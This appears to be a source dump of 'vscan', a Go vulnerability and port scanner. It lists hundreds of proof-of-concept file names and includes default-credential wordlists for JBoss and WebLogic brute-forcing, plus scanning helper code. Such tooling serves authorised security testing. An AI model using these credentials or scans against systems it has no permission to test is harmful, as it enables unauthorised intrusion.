├── dedecms-guestbook-sqli.yml │ ├── dedecms-membergroup-sqli.yml │ ├── dedecms-url-redirection.yml │ ├── discuz-ml3x-cnvd-2019-22239.yml │ ├── discuz-v72-sqli.yml │ ├── discuz-wechat-plugins-unauth.yml │ ├── discuz-wooyun-2010-080723.yml │ ├── dlink-850l-info-leak.yml │ ├── dlink-cve-2019-16920-rce.yml │ ├── dlink-cve-2019-17506.yml │ ├── dlink-cve-2020-25078-account-disclosure.yml │ ├── dlink-cve-2020-9376-dump-credentials.yml │ ├── dlink-dsl-2888a-rce.yml │ ├── docker-api-unauthorized-rce.yml │ ├── docker-registry-api-unauth.yml │ ├── dotnetcms-sqli.yml │ ├── draytek-cve-2020-8515.yml │ ├── druid-monitor-unauth.yml │ ├── drupal-cve-2014-3704-sqli.yml │ ├── drupal-cve-2018-7600-rce.yml │ ├── drupal-cve-2019-6340.yml │ ├── dubbo-admin-default-password.yml │ ├── duomicms-sqli.yml │ ├── dvr-cve-2018-9995.yml │ ├── e-zkeco-cnvd-2020-57264-read-file.yml │ ├── ecology-arbitrary-file-upload.yml │ ├── ecology-filedownload-directory-traversal.yml │ ├── ecology-javabeanshell-rce.yml │ ├── ecology-springframework-directory-traversal.yml │ ├── ecology-syncuserinfo-sqli.yml │ ├── ecology-v8-sqli.yml │ ├── ecology-validate-sqli.yml │ ├── ecology-workflowcentertreedata-sqli.yml │ ├── ecshop-cnvd-2020-58823-sqli.yml │ ├── ecshop-collection-list-sqli.yml │ ├── ecshop-rce.yml │ ├── eea-info-leak-cnvd-2021-10543.yml │ ├── elasticsearch-cve-2014-3120.yml │ ├── elasticsearch-cve-2015-1427.yml │ ├── elasticsearch-cve-2015-3337-lfi.yml │ ├── elasticsearch-cve-2015-5531.yml │ ├── elasticsearch-unauth.yml │ ├── etcd-unauth.yml │ ├── etouch-v2-sqli.yml │ ├── exchange-cve-2021-26855-ssrf.yml │ ├── exchange-cve-2021-41349-xss.yml │ ├── f5-cve-2021-22986.yml │ ├── f5-tmui-cve-2020-5902-rce.yml │ ├── fangweicms-sqli.yml │ ├── feifeicms-lfr.yml │ ├── finecms-sqli.yml │ ├── finereport-directory-traversal.yml │ ├── flexpaper-cve-2018-11686.yml │ ├── flink-jobmanager-cve-2020-17519-lfi.yml │ ├── fortigate-cve-2018-13379-readfile.yml │ ├── frp-dashboard-unauth.yml │ ├── gateone-cve-2020-35736.yml │ ├── gilacms-cve-2020-5515.yml │ ├── gitlab-graphql-info-leak-cve-2020-26413.yml │ ├── gitlab-ssrf-cve-2021-22214.yml │ ├── gitlist-rce-cve-2018-1000533.yml │ ├── glassfish-cve-2017-1000028-lfi.yml │ ├── go-pprof-leak.yml │ ├── gocd-cve-2021-43287.yml │ ├── grafana-default-password.yml │ ├── h2-database-web-console-unauthorized-access.yml │ ├── h3c-imc-rce.yml │ ├── h3c-secparh-any-user-login.yml │ ├── h5s-video-platform-cnvd-2020-67113-unauth.yml │ ├── hadoop-yarn-unauth.yml │ ├── hanming-video-conferencing-file-read.yml │ ├── harbor-cve-2019-16097.yml │ ├── hikvision-cve-2017-7921.yml │ ├── hikvision-info-leak.yml │ ├── hikvision-intercom-service-default-password.yml │ ├── hikvision-unauthenticated-rce-cve-2021-36260.yml │ ├── hjtcloud-arbitrary-fileread.yml │ ├── hjtcloud-directory-file-leak.yml │ ├── huawei-home-gateway-hg659-fileread.yml │ ├── ifw8-router-cve-2019-16313.yml │ ├── iis-put-getshell.yml │ ├── influxdb-unauth.yml │ ├── inspur-tscev4-cve-2020-21224-rce.yml │ ├── jboss-cve-2010-1871.yml │ ├── jboss-unauth.yml │ ├── jeewms-showordownbyurl-fileread.yml │ ├── jellyfin-cve-2021-29490.yml │ ├── jellyfin-file-read-cve-2021-21402.yml │ ├── jenkins-cve-2018-1000600.yml │ ├── jenkins-cve-2018-1000861-rce.yml │ ├── jenkins-unauthorized-access.yml │ ├── jetty-cve-2021-28164.yml │ ├── jinher-oa-c6-default-password.yml │ ├── jira-cve-2019-11581.yml │ ├── jira-cve-2019-8442.yml │ ├── jira-cve-2019-8449.yml │ ├── jira-cve-2020-14179.yml │ ├── jira-cve-2020-14181.yml │ ├── jira-ssrf-cve-2019-8451.yml │ ├── joomla-cnvd-2019-34135-rce.yml │ ├── joomla-component-vreview-sql.yml │ ├── joomla-cve-2015-7297-sqli.yml │ ├── joomla-cve-2017-8917-sqli.yml │ ├── joomla-cve-2018-7314-sql.yml │ ├── joomla-ext-zhbaidumap-cve-2018-6605-sqli.yml │ ├── jumpserver-unauth-rce.yml │ ├── jupyter-notebook-unauthorized-access.yml │ ├── kafka-manager-unauth.yml │ ├── kibana-cve-2018-17246.yml │ ├── kibana-unauth.yml │ ├── kingdee-eas-directory-traversal.yml │ ├── kingsoft-v8-default-password.yml │ ├── kingsoft-v8-file-read.yml │ ├── kong-cve-2020-11710-unauth.yml │ ├── kubernetes-unauth.yml │ ├── kyan-network-monitoring-account-password-leakage.yml │ ├── landray-oa-custom-jsp-fileread.yml │ ├── lanproxy-cve-2021-3019-lfi.yml │ ├── laravel-cve-2021-3129.yml │ ├── laravel-debug-info-leak.yml │ ├── laravel-improper-webdir.yml │ ├── maccms-rce.yml │ ├── maccmsv10-backdoor.yml │ ├── metinfo-cve-2019-16996-sqli.yml │ ├── metinfo-cve-2019-16997-sqli.yml │ ├── metinfo-cve-2019-17418-sqli.yml │ ├── metinfo-file-read.yml │ ├── metinfo-lfi-cnvd-2018-13393.yml │ ├── minio-default-password.yml │ ├── mongo-express-cve-2019-10758.yml │ ├── mpsec-isg1000-file-read.yml │ ├── msvod-sqli.yml │ ├── myucms-lfr.yml │ ├── nagio-cve-2018-10735.yml │ ├── nagio-cve-2018-10736.yml │ ├── nagio-cve-2018-10737.yml │ ├── nagio-cve-2018-10738.yml │ ├── natshell-arbitrary-file-read.yml │ ├── netentsec-icg-default-password.yml │ ├── netentsec-ngfw-rce.yml │ ├── netgear-cve-2017-5521.yml │ ├── nextjs-cve-2017-16877.yml │ ├── nexus-cve-2019-7238.yml │ ├── nexus-cve-2020-10199.yml │ ├── nexus-cve-2020-10204.yml │ ├── nexus-default-password.yml │ ├── nexusdb-cve-2020-24571-path-traversal.yml │ ├── nhttpd-cve-2019-16278.yml │ ├── node-red-dashboard-file-read-cve-2021-3223.yml │ ├── novnc-url-redirection-cve-2021-3654.yml │ ├── nps-default-password.yml │ ├── ns-asg-file-read.yml │ ├── nsfocus-uts-password-leak.yml │ ├── nuuo-file-inclusion.yml │ ├── odoo-file-read.yml │ ├── openfire-cve-2019-18394-ssrf.yml │ ├── opentsdb-cve-2020-35476-rce.yml │ ├── panabit-gateway-default-password.yml │ ├── panabit-ixcache-default-password.yml │ ├── pandorafms-cve-2019-20224-rce.yml │ ├── pbootcms-database-file-download.yml │ ├── pentaho-cve-2021-31602-authentication-bypass.yml │ ├── php-cgi-cve-2012-1823.yml │ ├── phpcms-cve-2018-19127.yml │ ├── phpmyadmin-cve-2018-12613-file-inclusion.yml │ ├── phpmyadmin-setup-deserialization.yml │ ├── phpok-sqli.yml │ ├── phpshe-sqli.yml │ ├── phpstudy-backdoor-rce.yml │ ├── phpstudy-nginx-wrong-resolve.yml │ ├── phpunit-cve-2017-9841-rce.yml │ ├── powercreator-arbitrary-file-upload.yml │ ├── prometheus-url-redirection-cve-2021-29622.yml │ ├── pulse-cve-2019-11510.yml │ ├── pyspider-unauthorized-access.yml │ ├── qibocms-sqli.yml │ ├── qilin-bastion-host-rce.yml │ ├── qizhi-fortressaircraft-unauthorized.yml │ ├── qnap-cve-2019-7192.yml │ ├── rabbitmq-default-password.yml │ ├── rails-cve-2018-3760-rce.yml │ ├── razor-cve-2018-8770.yml │ ├── rconfig-cve-2019-16663.yml │ ├── resin-cnnvd-200705-315.yml │ ├── resin-inputfile-fileread-or-ssrf.yml │ ├── resin-viewfile-fileread.yml │ ├── rockmongo-default-password.yml │ ├── ruijie-eg-cli-rce.yml │ ├── ruijie-eg-file-read.yml │ ├── ruijie-eg-info-leak.yml │ ├── ruijie-eweb-rce-cnvd-2021-09650.yml │ ├── ruijie-nbr1300g-cli-password-leak.yml │ ├── ruijie-uac-cnvd-2021-14536.yml │ ├── ruoyi-management-fileread.yml │ ├── saltstack-cve-2020-16846.yml │ ├── saltstack-cve-2021-25282-file-write.yml │ ├── samsung-wea453e-default-pwd.yml │ ├── samsung-wea453e-rce.yml │ ├── samsung-wlan-ap-wea453e-rce.yml │ ├── sangfor-ba-rce.yml │ ├── sangfor-edr-arbitrary-admin-login.yml │ ├── sangfor-edr-cssp-rce.yml │ ├── sangfor-edr-tool-rce.yml │ ├── satellian-cve-2020-7980-rce.yml │ ├── seacms-before-v992-rce.yml │ ├── seacms-rce.yml │ ├── seacms-sqli.yml │ ├── seacms-v654-rce.yml │ ├── seacmsv645-command-exec.yml │ ├── secnet-ac-default-password.yml │ ├── seeyon-a6-employee-info-leak.yml │ ├── seeyon-ajax-unauthorized-access.yml │ ├── seeyon-cnvd-2020-62422-readfile.yml │ ├── seeyon-oa-cookie-leak.yml │ ├── seeyon-session-leak.yml │ ├── seeyon-wooyun-2015-0108235-sqli.yml │ ├── seeyon-wooyun-2015-148227.yml │ ├── shiziyu-cms-apicontroller-sqli.yml │ ├── shopxo-cnvd-2021-15822.yml │ ├── showdoc-default-password.yml │ ├── showdoc-uploadfile.yml │ ├── skywalking-cve-2020-9483-sqli.yml │ ├── solarwinds-cve-2020-10148.yml │ ├── solr-cve-2017-12629-xxe.yml │ ├── solr-cve-2019-0193.yml │ ├── solr-fileread.yml │ ├── solr-velocity-template-rce.yml │ ├── sonarqube-cve-2020-27986-unauth.yml │ ├── sonicwall-ssl-vpn-rce.yml │ ├── spark-api-unauth.yml │ ├── spark-webui-unauth.yml │ ├── spon-ip-intercom-file-read.yml │ ├── spon-ip-intercom-ping-rce.yml │ ├── spring-cloud-cve-2020-5405.yml │ ├── spring-cloud-cve-2020-5410.yml │ ├── spring-cve-2016-4977.yml │ ├── springboot-env-unauth.yml │ ├── springcloud-cve-2019-3799.yml │ ├── supervisord-cve-2017-11610.yml │ ├── tamronos-iptv-rce.yml │ ├── telecom-gateway-default-password.yml │ ├── tensorboard-unauth.yml │ ├── terramaster-cve-2020-15568.yml │ ├── terramaster-tos-rce-cve-2020-28188.yml │ ├── thinkadmin-v6-readfile.yml │ ├── thinkcmf-lfi.yml │ ├── thinkcmf-write-shell.yml │ ├── thinkphp-controller-rce.yml │ ├── thinkphp-method-rce.yml │ ├── thinkphp-v6-file-write.yml │ ├── thinkphp5-controller-rce.yml │ ├── thinkphp5023-method-rce.yml │ ├── tianqing-info-leak.yml │ ├── tomcat-cve-2017-12615-rce.yml │ ├── tomcat-cve-2018-11759.yml │ ├── tongda-meeting-unauthorized-access.yml │ ├── tongda-user-session-disclosure.yml │ ├── tpshop-directory-traversal.yml │ ├── tpshop-sqli.yml │ ├── tvt-nvms-1000-file-read-cve-2019-20085.yml │ ├── typecho-rce.yml │ ├── ueditor-cnvd-2017-20077-file-upload.yml │ ├── uwsgi-cve-2018-7490.yml │ ├── vbulletin-cve-2019-16759-bypass.yml │ ├── vbulletin-cve-2019-16759.yml │ ├── vmware-vcenter-arbitrary-file-read.yml │ ├── vmware-vcenter-cve-2021-21985-rce.yml │ ├── vmware-vcenter-unauthorized-rce-cve-2021-21972.yml │ ├── vmware-vrealize-cve-2021-21975-ssrf.yml │ ├── weaver-ebridge-file-read.yml │ ├── weblogic-cve-2017-10271.yml │ ├── weblogic-cve-2019-2725.yml │ ├── weblogic-cve-2019-2729-1.yml │ ├── weblogic-cve-2019-2729-2.yml │ ├── weblogic-cve-2020-14750.yml │ ├── weblogic-ssrf.yml │ ├── webmin-cve-2019-15107-rce.yml │ ├── weiphp-path-traversal.yml │ ├── weiphp-sql.yml │ ├── wifisky-default-password-cnvd-2021-39012.yml │ ├── wordpress-cve-2019-19985-infoleak.yml │ ├── wordpress-ext-adaptive-images-lfi.yml │ ├── wordpress-ext-mailpress-rce.yml │ ├── wuzhicms-v410-sqli.yml │ ├── xdcms-sql.yml │ ├── xiuno-bbs-cvnd-2019-01348-reinstallation.yml │ ├── xunchi-cnvd-2020-23735-file-read.yml │ ├── yapi-rce.yml │ ├── yccms-rce.yml │ ├── yongyou-u8-oa-sqli.yml │ ├── yonyou-grp-u8-sqli-to-rce.yml │ ├── yonyou-grp-u8-sqli.yml │ ├── yonyou-nc-arbitrary-file-upload.yml │ ├── yonyou-nc-bsh-servlet-bshservlet-rce.yml │ ├── youphptube-encoder-cve-2019-5127.yml │ ├── youphptube-encoder-cve-2019-5128.yml │ ├── youphptube-encoder-cve-2019-5129.yml │ ├── yungoucms-sqli.yml │ ├── zabbix-authentication-bypass.yml │ ├── zabbix-cve-2016-10134-sqli.yml │ ├── zabbix-default-password.yml │ ├── zcms-v3-sqli.yml │ ├── zeit-nodejs-cve-2020-5284-directory-traversal.yml │ ├── zeroshell-cve-2019-12725-rce.yml │ ├── zimbra-cve-2019-9670-xxe.yml │ └── zzcms-zsmanage-sqli.yml └── yml_poc_check.go └── static ├── Installation.md ├── development.md ├── logo.png ├── pocs.md ├── running.md ├── scenario.md ├── starfile.jpeg ├── usage.md └── vscan-run.png /.github/build/linux.yml: -------------------------------------------------------------------------------- 1 | env: 2 | - GO111MODULE=on 3 | before: 4 | hooks: 5 | - go mod tidy 6 | project_name: vscan 7 | builds: 8 | - id: vscan-linux 9 | ldflags: 10 | - -s -w 11 | binary: vscan 12 | env: 13 | - CGO_ENABLED=1 14 | main: main.go 15 | goos: 16 | - linux 17 | goarch: 18 | - amd64 19 | archives: 20 | - format: zip 21 | 22 | checksum: 23 | name_template: "{{ .ProjectName }}-linux-checksums.txt" 24 | -------------------------------------------------------------------------------- /.github/build/mac.yml: -------------------------------------------------------------------------------- 1 | env: 2 | - GO111MODULE=on 3 | before: 4 | hooks: 5 | - go mod tidy 6 | project_name: vscan 7 | builds: 8 | - id: vscan-darwin 9 | ldflags: 10 | - -s -w 11 | binary: vscan 12 | env: 13 | - CGO_ENABLED=1 14 | main: main.go 15 | goos: 16 | - darwin 17 | goarch: 18 | - amd64 19 | 20 | archives: 21 | - format: zip 22 | replacements: 23 | darwin: macOS 24 | 25 | checksum: 26 | name_template: "{{ .ProjectName }}-mac-checksums.txt" 27 | -------------------------------------------------------------------------------- /.github/build/windows.yml: -------------------------------------------------------------------------------- 1 | env: 2 | - GO111MODULE=on 3 | before: 4 | hooks: 5 | - go mod tidy 6 | project_name: vscan 7 | builds: 8 | - id: vscan-windows 9 | ldflags: 10 | - -s -w 11 | binary: vscan 12 | env: 13 | - CGO_ENABLED=1 14 | - CC=x86_64-w64-mingw32-gcc 15 | - CXX=x86_64-w64-mingw32-g++ 16 | main: main.go 17 | goos: 18 | - windows 19 | goarch: 20 | - amd64 21 | 22 | archives: 23 | - format: zip 24 | 25 | checksum: 26 | name_template: "{{ .ProjectName }}-windows-checksums.txt" 27 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Binaries for programs and plugins 2 | .idea 3 | *.iml 4 | *.exe 5 | *.exe~ 6 | *.dll 7 | *.so 8 | *.dylib 9 | 10 | # Test binary, built with `go test -c` 11 | *.test 12 | 13 | # Output of the go coverage tool, specifically when used with LiteIDE 14 | *.out 15 | 16 | # Dependency directories (remove the comment below to include it) 17 | # vendor/ 18 | -------------------------------------------------------------------------------- /brute/dicts/jbossuserpass.txt: -------------------------------------------------------------------------------- 1 | jboss,jboss 2 | admin,admin 3 | jboss,123456 4 | admin,123456 5 | -------------------------------------------------------------------------------- /brute/dicts/weblogicuserpass.txt: -------------------------------------------------------------------------------- 1 | weblogic,weblogic 2 | weblogic,welcome1 3 | weblogic,Oracle@123 4 | weblogic,123456 5 | weblogic,weblogic123 6 | system,password 7 | guest,guest 8 | portaladmin,portaladmin 9 | admin,security 10 | joe,password 11 | mary,password 12 | system,security 13 | wlcsystem,wlcsystem 14 | wlcsystem,sipisystem -------------------------------------------------------------------------------- /pkg/fingerprint/eHoleFingerData.go: -------------------------------------------------------------------------------- 1 | package fingerprint 2 | 3 | import ( 4 | _ "embed" 5 | ) 6 | 7 | //go:embed dicts/eHoleFinger.json 8 | var eHoleFinger string -------------------------------------------------------------------------------- /pkg/fingerprint/localFingerData.go: -------------------------------------------------------------------------------- 1 | package fingerprint 2 | 3 | import ( 4 | _ "embed" 5 | ) 6 | 7 | //go:embed dicts/localFinger.json 8 | var localFinger string -------------------------------------------------------------------------------- /pkg/fingerprint/matchfinger.go: -------------------------------------------------------------------------------- 1 | package fingerprint 2 | 3 | import ( 4 | "regexp" 5 | "strings" 6 | ) 7 | 8 | func iskeyword(str string, keyword []string) bool { 9 | var x bool 10 | x = true 11 | for _, k := range keyword { 12 | if strings.Contains(strings.ToLower(str), strings.ToLower(k)) { 13 | x = x && true 14 | } else { 15 | x = x && false 16 | } 17 | } 18 | return x 19 | } 20 | 21 | func isregular(str string, keyword []string) bool { 22 | var x bool 23 | x = true 24 | for _, k := range keyword { 25 | re := regexp.MustCompile(k) 26 | if re.Match([]byte(str)) { 27 | x = x && true 28 | } else { 29 | x = x && false 30 | } 31 | } 32 | return x 33 | } 34 | -------------------------------------------------------------------------------- /pkg/httpx/common/customheader/customheader.go: -------------------------------------------------------------------------------- 1 | package customheader 2 | 3 | import ( 4 | "github.com/projectdiscovery/stringsutil" 5 | ) 6 | 7 | // CustomHeaders valid for all requests 8 | type CustomHeaders []string 9 | 10 | // String returns just a label 11 | func (c *CustomHeaders) String() string { 12 | return "Custom Global Headers" 13 | } 14 | 15 | // Set a new global header 16 | func (c *CustomHeaders) Set(value string) error { 17 | *c = append(*c, value) 18 | return nil 19 | } 20 | 21 | // Has checks if the list contains a header name 22 | func (c *CustomHeaders) Has(header string) bool { 23 | for _, customHeader := range *c { 24 | if stringsutil.HasPrefixAny(customHeader, header) { 25 | return true 26 | } 27 | } 28 | 29 | return false 30 | } 31 | -------------------------------------------------------------------------------- /pkg/httpx/common/customheader/doc.go: -------------------------------------------------------------------------------- 1 | // Package customheader contains all the funcionality to deal with Custom Global Headers 2 | package customheader 3 | -------------------------------------------------------------------------------- /pkg/httpx/common/customlist/customlist.go: -------------------------------------------------------------------------------- 1 | package customlist 2 | 3 | import "github.com/veo/vscan/pkg/httpx/common/fileutil" 4 | 5 | const maxRecursion = 10 6 | 7 | // CustomList for fastdialer 8 | type CustomList []string 9 | 10 | // String returns just a label 11 | func (c *CustomList) String() string { 12 | return "Custom Global List" 13 | } 14 | 15 | // Set a new global header 16 | func (c *CustomList) Set(value string) error { 17 | values := fileutil.LoadCidrsFromSliceOrFileWithMaxRecursion(value, ",", maxRecursion) 18 | *c = append(*c, values...) 19 | return nil 20 | } 21 | -------------------------------------------------------------------------------- /pkg/httpx/common/customlist/doc.go: -------------------------------------------------------------------------------- 1 | // Package customlist contains all the funcionality to deal with Custom Target List 2 | package customlist 3 | -------------------------------------------------------------------------------- /pkg/httpx/common/customports/doc.go: -------------------------------------------------------------------------------- 1 | // Package customport contains all the funcionality to deal with HTTP ports 2 | package customport 3 | -------------------------------------------------------------------------------- /pkg/httpx/common/fileutil/doc.go: -------------------------------------------------------------------------------- 1 | // Package fileutil contains all the funcionality related to deal with files 2 | package fileutil 3 | -------------------------------------------------------------------------------- /pkg/httpx/common/hashes/doc.go: -------------------------------------------------------------------------------- 1 | package hashes 2 | -------------------------------------------------------------------------------- /pkg/httpx/common/httputilz/doc.go: -------------------------------------------------------------------------------- 1 | // Package httputilz contains all the funcionality related to common HTTP operations, dump, define methods... 2 | package httputilz 3 | -------------------------------------------------------------------------------- /pkg/httpx/common/httpx/cdn.go: -------------------------------------------------------------------------------- 1 | package httpx 2 | 3 | import ( 4 | "fmt" 5 | "net" 6 | ) 7 | 8 | // CdnCheck verifies if the given ip is part of Cdn ranges 9 | func (h *HTTPX) CdnCheck(ip string) (bool, string, error) { 10 | if h.cdn == nil { 11 | return false, "", fmt.Errorf("cdn client not configured") 12 | } 13 | 14 | return h.cdn.Check(net.ParseIP(ip)) 15 | } 16 | -------------------------------------------------------------------------------- /pkg/httpx/common/httpx/doc.go: -------------------------------------------------------------------------------- 1 | // Package httpx containst the httpx common funcionality 2 | package httpx 3 | -------------------------------------------------------------------------------- /pkg/httpx/common/httpx/tls.go: -------------------------------------------------------------------------------- 1 | package httpx 2 | 3 | import ( 4 | "net/http" 5 | 6 | "github.com/projectdiscovery/cryptoutil" 7 | ) 8 | 9 | // TLSGrab fills the TLSData 10 | func (h *HTTPX) TLSGrab(r *http.Response) *cryptoutil.TLSData { 11 | if r.TLS != nil { 12 | return cryptoutil.TLSGrab(r.TLS) 13 | } 14 | return nil 15 | } 16 | -------------------------------------------------------------------------------- /pkg/httpx/common/regexhelper/regex.go: -------------------------------------------------------------------------------- 1 | package regexhelper 2 | 3 | import "regexp" 4 | 5 | var ( 6 | JarmHashRegex = regexp.MustCompile("(?m)0{62}") 7 | ) 8 | -------------------------------------------------------------------------------- /pkg/httpx/common/slice/doc.go: -------------------------------------------------------------------------------- 1 | // Package slice contains a set of utilities to deal with slices 2 | package slice 3 | -------------------------------------------------------------------------------- /pkg/httpx/common/stringz/doc.go: -------------------------------------------------------------------------------- 1 | // Package stringz contains a set of utilities to deal with strings 2 | package stringz 3 | -------------------------------------------------------------------------------- /pkg/httpx/runner/doc.go: -------------------------------------------------------------------------------- 1 | // Package runner executes the enumeration process. 2 | package runner 3 | -------------------------------------------------------------------------------- /pkg/httpx/runner/resume.go: -------------------------------------------------------------------------------- 1 | package runner 2 | 3 | type ResumeCfg struct { 4 | ResumeFrom string 5 | Index int 6 | current string 7 | currentIndex int 8 | } 9 | -------------------------------------------------------------------------------- /pkg/jndi/jndilog.go: -------------------------------------------------------------------------------- 1 | package jndi 2 | 3 | import ( 4 | "encoding/hex" 5 | "strings" 6 | ) 7 | 8 | func Jndilogchek(randomstr string) bool { 9 | if JndiLog == nil { 10 | return false 11 | } 12 | for _, log := range JndiLog { 13 | HexRandomstr := hex.EncodeToString([]byte(randomstr)) 14 | if strings.Contains(log, HexRandomstr) { 15 | return true 16 | } 17 | } 18 | return false 19 | } 20 | -------------------------------------------------------------------------------- /pkg/naabu/v2/pkg/privileges/privileges.go: -------------------------------------------------------------------------------- 1 | package privileges 2 | 3 | var IsPrivileged bool 4 | 5 | func init() { 6 | IsPrivileged = isPrivileged() 7 | } 8 | -------------------------------------------------------------------------------- /pkg/naabu/v2/pkg/privileges/privileges_darwin.go: -------------------------------------------------------------------------------- 1 | //go:build darwin 2 | 3 | package privileges 4 | 5 | import ( 6 | "os" 7 | ) 8 | 9 | // isPrivileged checks if the current process has the CAP_NET_RAW capability or is root 10 | func isPrivileged() bool { 11 | return os.Geteuid() == 0 12 | } 13 | -------------------------------------------------------------------------------- /pkg/naabu/v2/pkg/privileges/privileges_win.go: -------------------------------------------------------------------------------- 1 | //go:build windows 2 | 3 | package privileges 4 | 5 | // IsPrivileged on windows doesn't matter as we are using connect scan 6 | func isPrivileged() bool { 7 | return false 8 | } 9 | -------------------------------------------------------------------------------- /pkg/naabu/v2/pkg/runner/banners_test.go: -------------------------------------------------------------------------------- 1 | package runner 2 | 3 | import ( 4 | "testing" 5 | 6 | "github.com/stretchr/testify/assert" 7 | ) 8 | 9 | func TestShowNetworkInterfaces(t *testing.T) { 10 | // non root users should be able to list interfaces 11 | assert.Nil(t, showNetworkInterfaces()) 12 | } 13 | -------------------------------------------------------------------------------- /pkg/naabu/v2/pkg/runner/default.go: -------------------------------------------------------------------------------- 1 | package runner 2 | 3 | const ( 4 | DefaultPortTimeoutSynScan = 1000 5 | DefaultPortTimeoutConnectScan = 5000 6 | 7 | DefaultRateSynScan = 1000 8 | DefaultRateConnectScan = 1500 9 | 10 | DefaultRetriesSynScan = 3 11 | DefaultRetriesConnectScan = 3 12 | 13 | ExternalTargetForTune = "8.8.8.8" 14 | 15 | SynScan = "s" 16 | ConnectScan = "c" 17 | DefautStatsInterval = 5 18 | ) 19 | -------------------------------------------------------------------------------- /pkg/naabu/v2/pkg/runner/validate_test.go: -------------------------------------------------------------------------------- 1 | package runner 2 | 3 | import ( 4 | "testing" 5 | 6 | "github.com/pkg/errors" 7 | "github.com/stretchr/testify/assert" 8 | ) 9 | 10 | func TestOptions(t *testing.T) { 11 | options := Options{} 12 | assert.ErrorIs(t, errNoInputList, options.validateOptions()) 13 | 14 | options.Host = []string{"target1", "target2"} 15 | assert.EqualError(t, options.validateOptions(), errors.Wrap(errZeroValue, "timeout").Error()) 16 | 17 | options.Timeout = 2 18 | assert.EqualError(t, options.validateOptions(), errors.Wrap(errZeroValue, "rate").Error()) 19 | 20 | options.Resolvers = "aaabbbccc" 21 | assert.NotNil(t, options.validateOptions()) 22 | } 23 | -------------------------------------------------------------------------------- /pkg/naabu/v2/pkg/scan/cdn.go: -------------------------------------------------------------------------------- 1 | package scan 2 | 3 | import ( 4 | "net" 5 | 6 | "github.com/pkg/errors" 7 | "github.com/projectdiscovery/iputil" 8 | ) 9 | 10 | // CdnCheck verifies if the given ip is part of Cdn ranges 11 | func (s *Scanner) CdnCheck(ip string) (bool, string, error) { 12 | if s.cdn == nil { 13 | return false, "", errors.New("cdn client not initialized") 14 | } 15 | if !iputil.IsIP(ip) { 16 | return false, "", errors.Errorf("%s is not a valid ip", ip) 17 | } 18 | return s.cdn.Check(net.ParseIP(ip)) 19 | } 20 | -------------------------------------------------------------------------------- /pkg/naabu/v2/pkg/scan/cdn_test.go: -------------------------------------------------------------------------------- 1 | package scan 2 | 3 | import ( 4 | "testing" 5 | 6 | "github.com/stretchr/testify/assert" 7 | ) 8 | 9 | func TestCdnCheck(t *testing.T) { 10 | s, err := NewScanner(&Options{ExcludeCdn: true}) 11 | assert.Nil(t, err) 12 | tests := []struct { 13 | args string 14 | want bool 15 | wantErr bool 16 | }{ 17 | {"192.168.1.1", false, false}, 18 | {"10.10.10.10", false, false}, 19 | {"aaaaa", false, true}, 20 | } 21 | for _, tt := range tests { 22 | t.Run(tt.args, func(t *testing.T) { 23 | isCdn, _, err := s.CdnCheck(tt.args) 24 | if tt.wantErr { 25 | assert.NotNil(t, err) 26 | } else { 27 | assert.Nil(t, err) 28 | } 29 | assert.Equal(t, tt.want, isCdn) 30 | }) 31 | } 32 | } 33 | -------------------------------------------------------------------------------- /pkg/naabu/v2/pkg/scan/connect.go: -------------------------------------------------------------------------------- 1 | package scan 2 | 3 | import ( 4 | "fmt" 5 | "net" 6 | 7 | "github.com/projectdiscovery/gologger" 8 | ) 9 | 10 | // ConnectVerify is used to verify if ports are accurate using a connect request 11 | func (s *Scanner) ConnectVerify(host string, ports map[int]struct{}) map[int]struct{} { 12 | for port := range ports { 13 | conn, err := net.DialTimeout("tcp", fmt.Sprintf("%s:%d", host, port), s.timeout) 14 | if err != nil { 15 | delete(ports, port) 16 | continue 17 | } 18 | gologger.Debug().Msgf("Validated active port %d on %s\n", port, host) 19 | conn.Close() 20 | } 21 | return ports 22 | } 23 | -------------------------------------------------------------------------------- /pkg/naabu/v2/pkg/scan/connect_test.go: -------------------------------------------------------------------------------- 1 | package scan 2 | 3 | import ( 4 | "net" 5 | "testing" 6 | 7 | "github.com/stretchr/testify/assert" 8 | ) 9 | 10 | func TestConnectVerify(t *testing.T) { 11 | go func() { 12 | // start tcp server 13 | l, err := net.Listen("tcp", ":17895") 14 | if err != nil { 15 | assert.Nil(t, err) 16 | } 17 | defer l.Close() 18 | for { 19 | conn, err := l.Accept() 20 | if err != nil { 21 | return 22 | } 23 | defer conn.Close() 24 | } 25 | }() 26 | 27 | s, err := NewScanner(&Options{}) 28 | assert.Nil(t, err) 29 | wanted := map[int]struct{}{17895: {}} 30 | got := s.ConnectVerify("localhost", map[int]struct{}{17895: {}, 17896: {}}) 31 | assert.EqualValues(t, wanted, got) 32 | } 33 | -------------------------------------------------------------------------------- /pkg/naabu/v2/pkg/scan/externalip.go: -------------------------------------------------------------------------------- 1 | package scan 2 | 3 | import ( 4 | "context" 5 | "io/ioutil" 6 | "net/http" 7 | ) 8 | 9 | // WhatsMyIP attempts to obtain the external ip through public api 10 | func WhatsMyIP() (string, error) { 11 | req, err := http.NewRequestWithContext(context.Background(), http.MethodGet, "https://api.ipify.org?format=text", nil) 12 | if err != nil { 13 | return "", nil 14 | } 15 | 16 | resp, err := http.DefaultClient.Do(req) 17 | if err != nil { 18 | return "", err 19 | } 20 | 21 | defer resp.Body.Close() 22 | ip, err := ioutil.ReadAll(resp.Body) 23 | if err != nil { 24 | return "", err 25 | } 26 | 27 | return string(ip), nil 28 | } 29 | -------------------------------------------------------------------------------- /pkg/naabu/v2/pkg/scan/externalip_test.go: -------------------------------------------------------------------------------- 1 | package scan 2 | 3 | import ( 4 | "testing" 5 | 6 | "github.com/stretchr/testify/assert" 7 | ) 8 | 9 | func TestWhatsMyIP(t *testing.T) { 10 | externalIp, err := WhatsMyIP() 11 | assert.Nil(t, err) 12 | assert.NotEmpty(t, externalIp) 13 | } 14 | -------------------------------------------------------------------------------- /pkg/naabu/v2/pkg/scan/option.go: -------------------------------------------------------------------------------- 1 | package scan 2 | 3 | import ( 4 | "time" 5 | ) 6 | 7 | // Options of the scan 8 | type Options struct { 9 | Timeout time.Duration 10 | Retries int 11 | Rate int 12 | Debug bool 13 | ExcludeCdn bool 14 | ExcludedIps []string 15 | Proxy string 16 | Stream bool 17 | } 18 | -------------------------------------------------------------------------------- /pkg/naabu/v2/pkg/scan/tcpsequencer_test.go: -------------------------------------------------------------------------------- 1 | package scan 2 | 3 | import ( 4 | "testing" 5 | 6 | "github.com/stretchr/testify/assert" 7 | ) 8 | 9 | func TestTCPSequencer(t *testing.T) { 10 | tcpSequencer := 